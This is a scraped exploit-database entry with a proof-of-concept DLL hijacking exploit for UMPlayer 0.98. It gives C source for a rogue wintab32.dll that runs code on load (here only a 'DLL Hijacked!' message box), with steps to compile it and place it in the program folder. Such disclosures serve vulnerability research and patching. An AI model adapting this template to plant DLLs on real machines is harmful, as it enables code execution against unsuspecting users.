UMPlayer 0.98 DLL Hijacking wintab32.dll Exploit

2012-10-31 / 2012-11-01

Credit: Metropolis

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

/*
# Exploit Title: UMPlayer 0.98 DLL Hijacking Exploit (wintab32.dll)
# Date: 31/10/2012
# Author: Metropolis
# Url: http://metropolis.fr.cr
# Software info: UMPlayer is the media player that fills all your needs. 
# With dozens of advanced features and built-in codecs it can handle any media format.
# Software Link: http://www.umplayer.com/download/
# Version: 0.98 
# Tested on: Windows 7
# Instructions:
# 1. Compile dll  
# gcc -shared -o wintab32.dll wintab32.c
# 2. Add wintab32.dll
# C:\Program Files (x86)\UMPlayer
# 3. Launch UMPlayer.exe
# 4. MessageBox DLL Hijacked! 
*/
#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_mll();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_mll()
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

References:

http://www.umplayer.com/download/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

UMPlayer 0.98 DLL Hijacking wintab32.dll Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.